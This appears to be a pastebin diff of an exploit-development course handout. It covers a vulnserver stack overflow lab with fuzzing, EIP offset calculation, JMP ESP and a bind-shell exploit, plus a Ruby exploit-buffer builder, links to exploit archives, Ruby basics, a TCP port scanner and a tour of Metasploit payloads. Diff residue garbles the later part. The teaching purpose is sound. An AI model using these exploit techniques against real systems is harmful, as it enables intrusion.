View difference between Paste ID: XNsyGMmW and iYE5rG0t

########
# Tips #
########
https://ired.team/offensive-security/powershell-constrained-language-mode-bypass




#####################################
# Quick Stack Based Buffer Overflow #
#####################################

- You can download everything you need for this exercise from the links below (copy nc.exe into the c:\windows\system32 directory)
http://45.63.104.73/ExploitLab.zip
http://45.63.104.73/nc-password-is-netcat.zip
http://45.63.104.73/1-SEH.zip
http://45.63.104.73/WarFTP.zip
http://45.63.104.73/SEH.zip
http://45.63.104.73/sws.zip
http://45.63.104.73/tftpd.zip
http://45.63.104.73/ffvlc.zip
http://45.63.104.73/pdf-exploit.zip


- Extract the ExploitLab.zip file to your Desktop

- Go to folder C:\Users\student\Desktop\ExploitLab\2-VulnServer, and run vulnserv.exe

- Open a new command prompt and type:

---------------------------Type This-----------------------------------

nc localhost 9999
--------------------------------------------------------------------------

- In the new command prompt window where you ran nc type:
HELP

- Go to folder C:\Users\student\Desktop\ExploitLab\4-AttackScripts
- Right-click on 1-simplefuzzer.py and choose 'Edit with Notepad++' so you can read what the script sends before running it

- Now double-click on 1-simplefuzzer.py
- You'll notice that vulnserv.exe crashes. Be sure to note which command it crashed on and how many As were sent.


- Restart vulnserv, and run 1-simplefuzzer.py again to confirm the crash is reproducible. Again, note the command and the number of As it crashed on.

- Now go to folder C:\Users\student\Desktop\ExploitLab\3-OllyDBG and start OllyDBG. Choose 'File' -> 'Attach' and attach to process vulnserv.exe

- Go back to folder C:\Users\student\Desktop\ExploitLab\4-AttackScripts and double-click on 1-simplefuzzer.py.

- Take note of the registers (EAX, ESP, EBP, EIP) that have been overwritten with As (0x41 bytes). EIP = 41414141 means the saved return address was overwritten and we control where execution goes.

- Now isolate the crash by restarting your debugger and running script 2-3000chars.py

- Calculate the distance to EIP by running script 3-3000chars.py
- This script sends 3000 non-repeating chars to vulnserv.exe, and EIP is overwritten with the value 396F4338

4-count-chars-to-EIP.py
- In the previous script EIP was overwritten with 396F4338. x86 is little-endian, so the bytes as they sit in the buffer are 38 43 6F 39, which is the ASCII string 8Co9
- so we search for 8Co9 in the string of non-repeating chars and count the distance to it (this is exactly what Metasploit's pattern_offset.rb does)

5-2006char-eip-check.py
- In this script we check that our calculation of the distance to EIP is correct: 2006 bytes of filler are followed by four Bs, so EIP should now read exactly 42424242. If it does not, the offset is wrong and nothing later in this sequence will work.

6-jmp-esp.py
- In this script we overwrite EIP with the address of a JMP ESP instruction (6250AF11) inside essfunc.dll. After the overflow ESP points into our buffer, so jumping to ESP lands execution on bytes we control. essfunc.dll is used because it loads at a fixed address (no ASLR), so the address stays valid across restarts.

7-first-exploit
- In this script we actually do the stack overflow and launch a bind shell on port 4444 (connect to it with nc)

8 - Take a look at the file vulnserv.rb and place it on your Ubuntu host via SCP, or copy the code and paste it into a file on the host.
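The pattern and offset arithmetic from scripts 3 to 6, written out in Ruby as an added example (it is not one of the course's Python scripts). It generates the same cyclic pattern Metasploit's pattern_create.rb produces, finds the offset of the crashing EIP value the way pattern_offset.rb does, and builds the step 5 and step 6 buffers with the addresses packed little-endian. The send_payload helper is an assumption, and the command prefix it takes is deliberately a parameter: the fuzzing step has you discover the vulnerable command yourself.

```ruby
require 'socket'

# Added example, not part of the ExploitLab scripts.
# Metasploit-style cyclic pattern "Aa0Aa1Aa2..." cut to +length+ bytes.
# Every 4-byte window is unique, so a value found in EIP maps to one offset.
def cyclic_pattern(length)
  out = String.new
  ('A'..'Z').each do |upper|
    ('a'..'z').each do |lower|
      ('0'..'9').each do |digit|
        out << upper << lower << digit
        return out[0, length] if out.length >= length
      end
    end
  end
  out[0, length]
end

# The debugger shows EIP as the number 0x396F4338, but x86 stores it
# little-endian, so the bytes that overwrote the return address were
# 38 43 6F 39 = "8Co9". 'V' packs a 32-bit unsigned little-endian value.
def eip_to_bytes(eip)
  [eip].pack('V')
end

# What pattern_offset.rb does: where in the pattern did those 4 bytes sit?
# Returns nil if the value is not from the pattern (e.g. a mangled EIP).
def pattern_offset(pattern, eip)
  pattern.index(eip_to_bytes(eip))
end

# Step 5 buffer: filler up to EIP, then "BBBB" so EIP must read 42424242.
def eip_check_buffer(offset)
  ('A' * offset).b + 'BBBB'.b
end

# Step 6/7 buffer: filler, return address (JMP ESP), a short NOP sled that
# ESP lands on after the jump, then the shellcode, padded to the crash length.
def exploit_buffer(offset, ret_addr, shellcode, total = 3000)
  buf = ('A' * offset).b
  buf << [ret_addr].pack('V')    # 0x6250AF11 -> "\x11\xAF\x50\x62" on the wire
  buf << ("\x90" * 16).b
  buf << shellcode.b
  buf << ('C' * (total - buf.bytesize)).b if buf.bytesize < total
  buf
end

# Assumed helper: deliver a buffer to vulnserver. +prefix+ is the vulnerable
# command plus its argument separator, which the fuzzing step has you discover.
def send_payload(host, port, prefix, payload)
  sock = TCPSocket.new(host, port)
  sock.recv(1024)                  # read the banner first
  sock.write(prefix.b + payload + "\r\n".b)
  sock.close
end

if __FILE__ == $PROGRAM_NAME
  pat = cyclic_pattern(3000)
  off = pattern_offset(pat, 0x396F4338)
  puts "EIP bytes in memory: #{eip_to_bytes(0x396F4338).inspect}"
  puts "distance to EIP: #{off}"
  buf = exploit_buffer(off, 0x6250AF11, "\xCC".b * 4)   # INT3s stand in for real shellcode
  puts "buffer length: #{buf.bytesize}, bytes at EIP: #{buf[off, 4].unpack1('H*')}"
end
```

Run it and the distance comes out as 2006, the same number baked into the name of 5-2006char-eip-check.py; if your crash value differs from 396F4338, pass your own value to pattern_offset and a nil result means EIP was not overwritten by the pattern at all.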


------------------------------



#########################################
# FreeFloat FTP Server Exploit Analysis #
#########################################



Analyze the following exploit code:
https://www.exploit-db.com/exploits/15689/

1. What is the target platform that this exploit works against?
2. What is the variable name for the distance to EIP?
3. What is the actual distance to EIP in bytes?
4. Describe what is happening in the variable 'junk2'




Analysis of the training walk-through based on EID: 15689:
http://45.63.104.73/ff.zip




ff1.py
1. What does the sys module do? (It exposes interpreter objects such as sys.argv and sys.exit; it does not run system commands, which is what os.system and subprocess are for.)
2. What is sys.argv[1] and sys.argv[2]?
3. What application entry point is being attacked in this script?



ff2.py
1. Explain what lines 18 - 20 are doing.
2. What is pattern_create.rb doing, and where can I find it?
3. Why can't I just double-click the file to run this script?



ff3.py
1. Explain what is happening in lines 17 to 25.
2. Explain what is happening in lines 30 to 32.
3. Why is everything below line 35 commented out?



ff4.py
1. Explain what is happening in lines 13 to 15.
2. Explain what is happening in line 19.
3. What is the total length of buff?



ff5.py
1. Explain what is happening in line 15.
2. What is struct.pack?
3. How big is the shellcode in this script?



ff6.py
1. What is the distance to EIP?
2. How big is the shellcode in this script?
3. What is the total byte length of the data being sent to this app?




ff7.py
1. What is a tuple in Python?
2. How big is the shellcode in this script?
3. Did your app crash from this script?




ff8.py
1. How big is the shellcode in this script?
2. What is try/except in Python?
3. What is socket.SOCK_STREAM in Python?



ff9.py
1. What is going on in lines 19 and 20?
2. What is the length of the NOPs?
3. What is socket.SOCK_STREAM in Python?




ff010.py
1. What is going on in lines 18 - 20?
2. What is going on in lines 29 - 32?
3. How would a stack adjustment help this script?


Required review videos to watch tonight:
----------------------------------------
https://www.youtube.com/playlist?list=PLWpmLW-3AVsjcz_VJFvofmIFVTk7T-Ukl
Please watch videos 1-5 tonight. Vivek has a thick accent so I understand that it may be difficult, but his material is very good - probably the best on the internet today.

Recommended (not required) videos to watch tonight:
---------------------------------------------------
For more background on Assembly I would recommend the following video series (videos 1-11):
https://www.youtube.com/playlist?list=PL6brsSrstzga43kcZRn6nbSi_GeXoZQhR
Again, you DO NOT have to watch these tonight, but if you are really interested in the subject of exploit development I think they will be very helpful.



---------------------------------------------------------------------------------------------------------------------
############################
# Day 2: Ruby Fundamentals #
############################



- Ruby is a general-purpose, object-oriented programming language created by Yukihiro Matsumoto, a computer scientist and programmer from Japan. It is a cross-platform dynamic language.

- The major implementations of this language are Ruby MRI, JRuby, HotRuby, IronRuby, MacRuby, etc. Ruby on Rails is a web framework written in Ruby, and Metasploit itself is written in Ruby, which is why the language matters for this course.

- Ruby's file name extensions are .rb and .rbw.

- The official website of the language is www.ruby-lang.org.

- Ruby ships with an interactive shell called IRB (Interactive Ruby). Open it up and play around: it prints the value of every expression you type, which is how the examples below are meant to be read.

---------------------------Type This-----------------------------------
irb
-----------------------------------------------------------------------


- Math, Variables, Classes, Creating Objects and Inheritance


The following arithmetic operators:
    Addition operator (+): 10 + 23
    Subtraction operator (-): 1001 - 34
    Multiplication operator (*): 5 * 5
    Division operator (/): 12 / 2 (integer division: 12 / 5 gives 2, not 2.4; use 12 / 5.0 or 12.fdiv(5) for a float)



- Now let's cover some variable techniques. In Ruby, you assign a value to a variable using the assignment operator '='. In the following example, 25 is assigned to x and then x + 30 is evaluated. Note that x + 30 only computes a new value (55) and displays it; x itself is still 25 afterwards. The same goes for y + 33. To actually change the variable you need x = x + 30 or the shortcut x += 30, covered below.

---------------------------Type This-----------------------------------
x = 25
x + 30
y = 69
y+33
-----------------------------------------------------------------------



- Let's look at creating classes and creating objects.

- Here, the name of the class is Attack. An object has its properties (attributes) and methods. attr_accessor creates a getter and a setter method for each attribute named, so of, sqli and xss can be read and assigned from outside the object.


---------------------------Type This-----------------------------------
class Attack
attr_accessor :of, :sqli, :xss
end
-----------------------------------------------------------------------


What is nil?
Reference:
https://www.codecademy.com/en/forum_questions/52a112378c1cccb0f6001638

nil is the Ruby object that represents nothingness. Whenever a method doesn't return a useful value, it returns nil. puts and print are methods that return nil.

Since IRB always shows the value of the last statement or expression in your code, if that last statement is print, you'll see the nil.

To prevent the nil from "sticking" to the output of print (which doesn't insert a line break), you can print a line break after it, and optionally put some other value as the last statement of your code; the console will then show that instead of nil.





# Now that we have created the class let's create an object
---------------------------Type This-----------------------------------
first_attack = Attack.new
first_attack.of = "stack"
first_attack.sqli = "blind"
first_attack.xss = "dom"
puts first_attack.of
puts first_attack.sqli
puts first_attack.xss
-----------------------------------------------------------------------




- Let's work on some inheritance that will help make your programming life easier. When we have multiple classes, inheritance becomes useful. In simple words, inheritance lets you classify classes: a subclass (written with <) gets all of the methods and attributes defined in its parent class, and can add or override its own. Inheritance makes your programming life easier by maximizing code reuse. Here every framework below inherits the scanners, exploits, shellcode and postmodules accessors from Exploitframeworks without redefining them.


---------------------------Type This-----------------------------------
class Exploitframeworks
attr_accessor :scanners, :exploits, :shellcode, :postmodules
end
class Metasploit < Exploitframeworks
end
class Canvas < Exploitframeworks
end
class Coreimpact < Exploitframeworks
end
class Saint < Exploitframeworks
end
class Exploitpack < Exploitframeworks
end
-----------------------------------------------------------------------




- Methods, More Objects, Arguments, String Functions and Expression Shortcuts

- Let's create a simple method. A method is used to perform an action and is generally called on an object.

- Here, the name of the method is 'learning'. This method is defined inside the Msfnl class. When it is called, it will print this string: "We are Learning how to PenTest"

- An object named 'joe' is created, which is used to call the method.


---------------------------Type This-----------------------------------
class Msfnl
def learning
puts "We are Learning how to PenTest"
end
end
-----------------------------------------------------------------------

#Now let's create an object and call our method on it

---------------------------Type This-----------------------------------
joe = Msfnl.new
joe.learning
-----------------------------------------------------------------------



- An argument is a value or variable that is passed to a method when calling it. In the following example, while calling the puts method, we are sending it a string value. This string value is used by the method to perform some particular operation (here, printing it).

puts("Pentesting")


- There are many useful string methods in Ruby (Ruby calls them methods rather than functions, because they are called on the string object). String methods make it easy to work with strings. Now, we will explain some useful string methods with an example.

- The length method calculates the length of a string. The upcase method converts a string to uppercase. And the reverse method reverses a string. The following example demonstrates how to use the string methods; note that they can be chained, as in the last line, because each one returns a new string.

---------------------------Type This-----------------------------------
55.class
"I Love Programming".class
"I Love Pentesting".length
"Pown that box".upcase
"Love" + "To Root Boxes"
"evil".reverse
"evil".reverse.upcase
-----------------------------------------------------------------------
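The class, inheritance, method and string pieces above combined into one small program, added here as an example (it is not code from the course). It goes a little beyond the snippets: initialize takes arguments with a default, a subclass calls super to extend rather than replace the parent's method, and the methods return strings instead of printing them so the values can be reused. The Finding, Sqli and Xss names are invented for the example.

```ruby
# Added example, not course code: the class/inheritance/method ideas above in one program.
class Finding
  attr_accessor :host, :port, :severity

  # initialize runs when .new is called; arguments can have defaults.
  def initialize(host, port, severity = :low)
    @host = host
    @port = port
    @severity = severity
  end

  # Returning a string (instead of puts-ing it) lets callers reuse the value.
  def summary
    "#{@host}:#{@port} #{@severity.to_s.upcase}"
  end

  # String methods chain because each returns a new string.
  def tag
    "#{self.class.name}-#{@host}".downcase.tr('.', '_')
  end
end

# A subclass inherits host/port/severity and summary/tag from Finding.
class Sqli < Finding
  attr_accessor :kind

  def initialize(host, port, kind)
    super(host, port, :high)      # super calls Finding#initialize
    @kind = kind
  end

  # Overriding a method while reusing the parent's version via super.
  def summary
    "#{super} (#{@kind} SQL injection)"
  end
end

class Xss < Finding
  def initialize(host, port, context)
    super(host, port, :medium)
    @context = context
  end

  def summary
    "#{super} (#{@context} XSS)"
  end
end

# A method with a default argument; the += shortcut counts severities.
def severity_counts(findings, counts = Hash.new(0))
  findings.each { |f| counts[f.severity] += 1 }
  counts
end

if __FILE__ == $PROGRAM_NAME
  findings = [
    Sqli.new('10.0.0.5', 80, 'blind'),
    Xss.new('10.0.0.5', 443, 'DOM'),
    Finding.new('10.0.0.7', 21)
  ]
  findings.each { |f| puts "#{f.tag}: #{f.summary}" }
  p severity_counts(findings)
end
```

Compare this with the Attack and Exploitframeworks snippets: attr_accessor still does the getters and setters, but initialize means an object cannot be created without its host and port, which is usually what you want for data that later code relies on.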


- Expressions and shortcuts. In the below example, 'a' is an operand, '3' is an operand, '=' is an operator, and 'a=3' is the expression. A statement consists of one or multiple expressions. Following are the examples of some expressions.

---------------------------Type This-----------------------------------
a = 3
b = 6
a+b+20
d = 44
f = d
puts f
-----------------------------------------------------------------------





- Shortcuts. +=, *= are the shortcuts. These operators are also called abbreviated assignment operators. Use the shortcuts to get the effect of two statements in just one. Consider the following statements to understand the shortcuts.

---------------------------Type This-----------------------------------
g = 70
g = g+44
g += 33
-----------------------------------------------------------------------


- In the above statement, g is incremented by 33 and then the total value (147) is assigned to g.



---------------------------Type This-----------------------------------
g *= 3
-----------------------------------------------------------------------


- In the above statement, g is multiplied by 3 and the result (441) is assigned back to g.

- Example

- Comparison Operators, Loops, Data Types, and Constants

- Comparison operators are used for comparing one variable or constant with another variable or constant. We will show how to use the following comparison operators.

'Less than' operator (<): This operator is used to check whether a variable or constant is less than another variable or constant. If it's less than the other, the 'less than' operator returns true.

'Equal to' operator (==): This operator is used to check whether a variable or constant is equal to another variable or constant. If it's equal to the other, the 'equal to' operator returns true. (Note the double =: a single = is assignment, so 'if x = 300' would assign 300 to x rather than compare.)

'Not equal to' operator (!=): This operator is used to check whether a variable or constant is not equal to another variable or constant. If it's not equal to the other, the 'not equal to' operator returns true.

---------------------------Type This-----------------------------------
numberofports = 55
puts "number of ports found during scan" if numberofports < 300
numberofports = 400
puts "number of ports found during scan" if numberofports < 300
puts "number of ports found during scan" if numberofports == 300
puts "number of ports found during scan" if numberofports != 300
-----------------------------------------------------------------------

- Only the first and last puts print: 55 < 300 is true; 400 < 300 and 400 == 300 are false; 400 != 300 is true.


Example


- The 'OR' operator and the 'unless' keyword. The symbol '||' represents the logical 'OR' operator.

- This operator is generally used to combine multiple conditions.
- In the case of two conditions, if both or either of the conditions is true, the 'OR' operator returns true. Consider the following example to understand how this operator works.

---------------------------Type This-----------------------------------
ports = 100
puts "number of ports found on the network" if ports<100 || ports>200
puts "number of ports found on the network" if ports<100 || ports>75
-----------------------------------------------------------------------

- The first line prints nothing (100 is neither below 100 nor above 200); the second prints, because 100 > 75 is true.

# unless

---------------------------Type This-----------------------------------
portsbelow1024 = 50
puts "If the ports are below 1024" unless portsbelow1024 < 1000
puts "If the ports are below 1024" unless portsbelow1024 < 1055
puts "If the ports are below 1024" unless portsbelow1024 < 20
-----------------------------------------------------------------------

- The 'unless' keyword runs the statement only when the condition is false (it is the opposite of 'if'). Here only the third line prints, because 50 < 20 is the only condition that is false.



- Loops are used to execute statement(s) repeatedly. Suppose you want to print a string 10 times.

- See the following example to understand how a string is printed 10 times on the screen using a loop.

---------------------------Type This-----------------------------------
10.times do puts "infosecaddicts" end
-----------------------------------------------------------------------

# Or use the curly braces

---------------------------Type This-----------------------------------
10.times {puts "infosecaddicts"}
-----------------------------------------------------------------------


- Changing Data Types: Data type conversion is an important concept in Ruby because it gives you flexibility while working with different data types. Data type conversion is also known as type casting. Input from the network or a file always arrives as a String, so a port number read from a scan has to be converted with to_i before it can be compared numerically ("80" < 100 raises an error, "80".to_i < 100 works). Be aware that to_i is lenient: "80abc".to_i is 80 and "abc".to_i is 0, whereas Integer("80abc") raises ArgumentError, which is the safer choice when the input is untrusted.



- Constants: Unlike variables, the values of constants remain fixed during the program's execution. A constant's name starts with a capital letter (for example MAX_PORTS = 65535). If you reassign a constant, Ruby lets it happen but prints an "already initialized constant" warning, so this is a convention enforced by warnings, not a hard guarantee.




- Multiple Line String Variable, Interpolation, and Regular Expressions

- A multiple line string variable (a heredoc) lets you assign the value to the string variable through multiple lines. The word after << is the terminator; the string ends at the line that contains only that word.

---------------------------Type This-----------------------------------
infosecaddicts = <<mark
welcome
to the
best
metasploit
course
on the
market
mark
puts infosecaddicts
-----------------------------------------------------------------------


- Interpolation lets you evaluate any placeholder within a string, and the placeholder is replaced with the value that it represents. So whatever you write inside #{ } will be evaluated and the value will be replaced at that position. Interpolation only happens inside double-quoted strings; in single quotes the #{ } is kept literally. Examine the following example to understand how interpolation works in Ruby.

References:
https://stackoverflow.com/questions/10869264/meaning-of-in-ruby


---------------------------Type This-----------------------------------
a = 4
b = 6
puts "a * b = a*b"
puts " #{a} * #{b} = #{a*b} "
person = "Joe McCray"
puts "IT Security consultant person"
puts "IT Security consultant #{person}"
-----------------------------------------------------------------------

- Notice that the placeholders inside #{ } are evaluated and replaced with their values, while the lines without #{ } print the words a*b and person literally.





- Character classes
- A character class [ ... ] in a regular expression matches any one of the characters listed in it; a range like [a-m] matches any one letter from a to m. scan finds every match in the string and hands each one to the block.
---------------------------Type This-----------------------------------
infosecaddicts = "I Scanned 45 hosts and found 500 vulnerabilities"
"I love metasploit and what it has to offer!".scan(/[lma]/) {|y| puts y}
"I love metasploit and what it has to offer!".scan(/[a-m]/) {|y| puts y}
-----------------------------------------------------------------------


- Arrays, Push and Pop, and Hashes


- In the following example, numbers is an array that holds 6 integer numbers. Array indexes start at 0, so numbers[0] is 2 and numbers[4] is 10.


---------------------------Type This-----------------------------------
numbers = [2,4,6,8,10,100]
puts numbers[0]
puts numbers[4]
numbers[2] = 150
puts numbers
-----------------------------------------------------------------------



- Now we will show how you can implement a stack using an array in Ruby. A stack has two operations: push (<< or push appends to the end) and pop (removes and returns the last element). shift is different: it removes the first element, which is queue behaviour rather than stack behaviour. After the lines below, framework holds just ["exploits"].


---------------------------Type This-----------------------------------
framework = []
framework << "modules"
framework << "exploits"
framework << "payloads"
framework.pop
framework.shift
-----------------------------------------------------------------------

- A Hash is a collection of elements, like the associative array in other languages. Each element has a key that is used to access the element.


- Hash is a Ruby object that has its own built-in methods. The methods make it easy to work with hashes. In this example, 'metasploit' is a hash. 'exploits', 'microsoft', 'Linux' are the keys, and the following are the respective values: 'what module should you use', 'Windows XP' and 'SSH'. Keys are looked up exactly, so metasploit['linux'] (lowercase) would return nil, not 'SSH'.

---------------------------Type This-----------------------------------
metasploit = {'exploits' => 'what module should you use', 'microsoft' => 'Windows XP', 'Linux' => 'SSH'}
print metasploit.size
print metasploit["microsoft"]
metasploit['microsoft'] = 'redhat'
print metasploit['microsoft']
-----------------------------------------------------------------------
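Type conversion, scan with character classes, arrays and hashes used together on something you will actually meet in this course, as an added example (not course code): turning a few lines of port-scan output into a hash of port => service. The input lines are constructed for the example, and the parse_scan_output, open_ports, parse_port and numbers_in names are mine.

```ruby
# Added example, not course code. The input is constructed for the example;
# it mimics the "port/proto state service" lines a port scanner prints.
SAMPLE_OUTPUT = <<~SCAN
  21/tcp   open   ftp
  22/tcp   open   ssh
  80/tcp   open   http
  443/tcp  closed https
  3306/tcp open   mysql
  junk line that should be ignored
SCAN

# Regex with character classes: \d matches a digit, [a-z] a lowercase letter,
# [a-z0-9-]+ one or more letters, digits or hyphens. (?<name>...) captures by name.
PORT_LINE = /(?<port>\d+)\/(?<proto>tcp|udp)\s+(?<state>[a-z]+)\s+(?<service>[a-z0-9-]+)/

# Parse the text into an array of hashes, one per recognised line.
# Strings from the input are converted with to_i (port) and to_sym (state);
# lines that do not match are dropped rather than guessed at.
def parse_scan_output(text)
  text.lines.filter_map do |line|
    m = PORT_LINE.match(line) or next
    { port: m[:port].to_i, proto: m[:proto], state: m[:state].to_sym, service: m[:service] }
  end
end

# Hash of port => service for the open ports only, so a lookup like
# open_ports(results)[22] answers "what is on 22?" directly.
def open_ports(results)
  results.select { |r| r[:state] == :open }
         .to_h { |r| [r[:port], r[:service]] }
end

# Strict conversion for untrusted input: Integer() raises on "80abc",
# where "80abc".to_i silently returns 80. Returns nil when not a valid port.
def parse_port(str)
  n = Integer(str, 10)
  (1..65_535).cover?(n) ? n : nil
rescue ArgumentError, TypeError
  nil
end

# scan with a character class pulls every number out of free text.
def numbers_in(text)
  text.scan(/\d+/).map(&:to_i)
end

if __FILE__ == $PROGRAM_NAME
  results = parse_scan_output(SAMPLE_OUTPUT)
  opened = open_ports(results)
  puts "open ports: #{opened.keys.sort.inspect}"
  puts "service on 22: #{opened[22]}"
  p numbers_in("I Scanned 45 hosts and found 500 vulnerabilities")
  p [parse_port("80"), parse_port("80abc"), parse_port("70000")]
end
```

The difference between parse_port and plain to_i is the security-relevant part: anything you read off the network or a command line is a String, and a lenient conversion turns garbage into a plausible-looking number instead of an error.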


- Writing Ruby Scripts


- Let's take a look at one of the Ruby modules and work out exactly what it is doing; be ready to explain it to me. If we take a look at the Ruby program what you find is that it is a TCP port scanner that someone made to look for a specific port. The port that it is looking for is port 21 FTP.
---------------------------Type This-----------------------------------
cd ~/toolz/metasploit/modules/auxiliary/scanner/portscan
ls
-----------------------------------------------------------------------
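To make the "explain what this program is doing" exercise concrete, here is a minimal TCP connect scanner in plain Ruby, added as an example; it is not the Metasploit module in that directory, just the same idea (try to connect, report the ports that accept) in a few lines. The demo starts a throwaway listener on 127.0.0.1 so it can be run offline with no target; the function names are mine.

```ruby
require 'socket'

# Added example, not the Metasploit module. A TCP connect scan: a port is
# "open" if the kernel completes the three-way handshake for us.
# connect_timeout keeps a filtered (silently dropped) port from hanging the scan.
def port_open?(host, port, timeout = 0.5)
  Socket.tcp(host, port, connect_timeout: timeout) { |_s| true }
rescue Errno::ECONNREFUSED, Errno::ETIMEDOUT, Errno::EHOSTUNREACH,
       Errno::ENETUNREACH, SocketError
  false
end

# Scan +ports+ on +host+ and return the open ones, in the order given.
def scan_ports(host, ports, timeout = 0.5)
  ports.select { |port| port_open?(host, port, timeout) }
end

# The "nice, easily readable format" part: one line per open port.
def report(host, found)
  return "#{host}: no open ports in range" if found.empty?
  found.map { |p| "#{host}:#{p} - TCP OPEN" }.join("\n")
end

# Demo against a listener we control, so this runs without any target.
# TCPServer on port 0 lets the OS pick a free port; server.addr[1] is that port.
def demo_scan
  server = TCPServer.new('127.0.0.1', 0)
  listening = server.addr[1]
  probe = TCPServer.new('127.0.0.1', 0)    # grab a second free port...
  closed = probe.addr[1]
  probe.close                               # ...and release it so it is closed
  found = scan_ports('127.0.0.1', [listening, closed])
  [listening, closed, found]
ensure
  server&.close
end

if __FILE__ == $PROGRAM_NAME
  listening, closed, found = demo_scan
  puts "listening on #{listening}, nothing on #{closed}"
  puts report('127.0.0.1', found)
end
```

This is a full connect scan, so every probe shows up in the target's logs as a completed connection; that is also why Metasploit's tcp.rb module is noisy compared with SYN scanning, which needs raw sockets and root.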
581
 
582
 
583
 
584
###########################
585
# Metasploit Fundamentals #
586
###########################
587
 
588
- Let's take a little look at Metasploit Framework
589
 
590
- First, we should take note of the different directories, the Modular Architecture.
591
 
592
The modules that make up the Modular Architecture are
593
Exploits
594
Auxiliary
595
Payload
596
Encoder
597
Nops
598
 
599
 
600
Important directories to keep in mind for Metasploit, in case we'd like to edit different modules, or add our own,
601
 
602
are
603-
cd ~/toolz/metasploit
603+
604
Modules
605
Scripts
606
Plugins
607
External
608
Data
609
Tools
610
 
611-
cd ~/toolz/metasploit/modules
611+
612
---------------------------Type This-----------------------------------
613
cd /usr/share/metasploit-framework
614
ls
615
-----------------------------------------------------------------------
616
 
617
 
618
 
619
- Now let's take a look inside the Modules directory and see what's there.
620
---------------------------Type This-----------------------------------
621
cd /usr/share/metasploit-framework/modules
622
ls
623
-----------------------------------------------------------------------
624-
cd ~/toolz/metasploit/external
624+
625
       
626
The auxiliary directory is where the things like our port-scanners will be, or any module that we can run that does
627
not necessarily need to - have a shell or session started on a machine.
628
 
629
The exploits directory has our modules that we need to pop a shell on a box.
630-
cd ~/toolz/metasploit/data
630+
631
like Burp Suite
632
- Let's take a look at the external directory
633
---------------------------Type This-----------------------------------
634
cd /usr/share/metasploit-framework/external
635
ls
636
-----------------------------------------------------------------------
637-
cd ~/toolz/metasploit/data/wordlists
637+
638
- Our data directory holds helper modules for Metasploit to use with exploits or auxiliary modules.
639
---------------------------Type This-----------------------------------
640
cd /usr/share/metasploit-framework/data
641
ls
642
-----------------------------------------------------------------------
643
 
644-
cd ~/toolz/metasploit/data/meterpreter
644+
645
brute-forcing
646
---------------------------Type This-----------------------------------
647
cd /usr/share/metasploit-framework/data/wordlists
648
ls
649
-----------------------------------------------------------------------
650
 
651
- The Meterpreter directory inside of the data directory houses the DLLs used for the functionality of Meterpreter
652
once a session is created.
653
---------------------------Type This-----------------------------------
654
cd /usr/share/metasploit-framework/data/meterpreter
655
ls
656
-----------------------------------------------------------------------
657
 
658
- The scripts inside the scripts/Meterpreter directory are scripts that Meterpreter uses for post-exploitation, things
659
like escalating privileges and dumping hashes.
660
 
661
These are being phased out, though, and post-exploitation modules are what is being more preferred.
662
The next important directory that we should get used to is the 'tools' directory. Inside the tools directory we'll
663-
cd ~/toolz/metasploit/modules/exploits
663+
664
for creating exploits, to a pattern offset script to find where at in machine language that we need to put in our
665
custom shellcode.
666
 
667
The final directory that we'll need to keep in mind is the plugins directory, which houses all the modules that have
668
to do with other programs to make things like importing and exporting reports simple.
669
Now that we have a clear understanding of what all of the different directories house, we can take a closer look at
670
the exploits directory and get a better understanding of how the directory structure is there, so if we make our own
671
modules we're going to have a better understanding of where everything needs to go.
672
---------------------------Type This-----------------------------------
673
cd /usr/share/metasploit-framework/modules/exploits
674
ls
675-
cd ~/toolz/metasploit/modules/auxiliary/
675+
676
 
677
 
678
- The exploits directory is split up into several different directories, each one housing exploits for different types
679
of systems. I.E. Windows, Unix, OSX, dialup and so on.
680
Likewise, if we were to go into the 'windows' directory, we're going to see that the exploits have been broken down
681
into categories of different types of services/programs, so that you can pick out an exploit specifically for the
682-
cd ~/toolz/metasploit/modules/auxiliary/scanner/
682+
683
for us.
684
---------------------------Type This-----------------------------------
685
cd /usr/share/metasploit-framework/modules/auxiliary/
686
ls
687
-----------------------------------------------------------------------      
688
 
689
 
690
- And a little further into the directory, let's take a look at what's in the scanner directory
691
---------------------------Type This-----------------------------------
692
cd /usr/share/metasploit-framework/modules/auxiliary/scanner/
693
ls
694
-----------------------------------------------------------------------
695
 
696
 
697
- And one more folder deeper into the structure, let's take a look in the portscan folder
698
---------------------------Type This-----------------------------------
699
cd /usr/share/metasploit-framework/modules/auxiliary/scanner/portscan
700
ls
701
-----------------------------------------------------------------------    
702
 
703
- If we run 'cat tcp.rb' we'll find that this module is simply a TCP scanner that will find tcp ports that are open
704
and report them back to us in a nice, easily readable format.
705-
cd ~/toolz/metasploit/modules/payloads/
705+
706
cat tcp.rb
707
   
708
 
709
 
710
- Just keep in mind that all of the modules in the auxiliary directory are there for information gathering and for use
711
once you have a session on a machine.
712
Taking a look at the payload directory, we can see all the available payloads, which are what run after an exploit
713
succeeds.
714
---------------------------Type This-----------------------------------
715
cd /usr/share/metasploit-framework/modules/payloads/
716
ls
717
-----------------------------------------------------------------------    
718
 
719
 
720
- There are three different types of payloads: single, stagers, and staged. Each type of payload has a different
721
application for it to be used as.
722
Single payloads do everything you need them to do at one single time, so they call a shell back to you and let you
723
do everything once you have that shell calling back to you.
724
Stagers are required for limited payload space so that the victim machine will call back to your attack box to get
725
the rest of the instructions on what it's supposed to do. The first stage of the payload doesn't require all that
726
much space to just call back to the attacking machine to have the rest of the payload sent to it, mainly being used
727
to download Stages payloads.
728
 
729
 
730
- Stages are downloaded by stagers and typically do complex tasks, like VNC sessions, Meterpreter sessions, or bind
731
shells.
732
---------------------------Type This-----------------------------------
733
cd singles
734
cd windows
735
ls
736
-----------------------------------------------------------------------
737
 
738
 
739
- We can see several different payloads here that we can use on a windows system. Let's take a look at adduser.rb and
740
see what it actually does.
741
---------------------------Type This-----------------------------------
742
cat adduser.rb
743
-----------------------------------------------------------------------
744
 
745
Which when looking at the code, we can see that it will add a new user called "Metasploit" to the machine and give
746
the new user "Metasploit" a password of "Metasploit$1". Further down in the file we can actually see the command that
it gives Windows to add the user to the system.
 
 
- Stagers just connect the victim machine back to yours to download the stage payload, usually with a
windows/shell/bind_tcp or windows/shell/reverse_tcp
---------------------------Type This-----------------------------------
cd ../../stagers
ls
-----------------------------------------------------------------------
 
 
- Again, we can see that we have stagers for multiple systems and code types.
---------------------------Type This-----------------------------------
ls windows/
-----------------------------------------------------------------------
 
 
As you can see, the stagers are mainly just to connect to the victim, to set up a bridge between us and the victim
machine, so we can upload or download our stage payloads and execute commands.
Lastly, we can go to our stages directory to see what all payloads are available for us to send over for use with
our stagers...
---------------------------Type This-----------------------------------
cd ../stages
ls
-----------------------------------------------------------------------
 
 
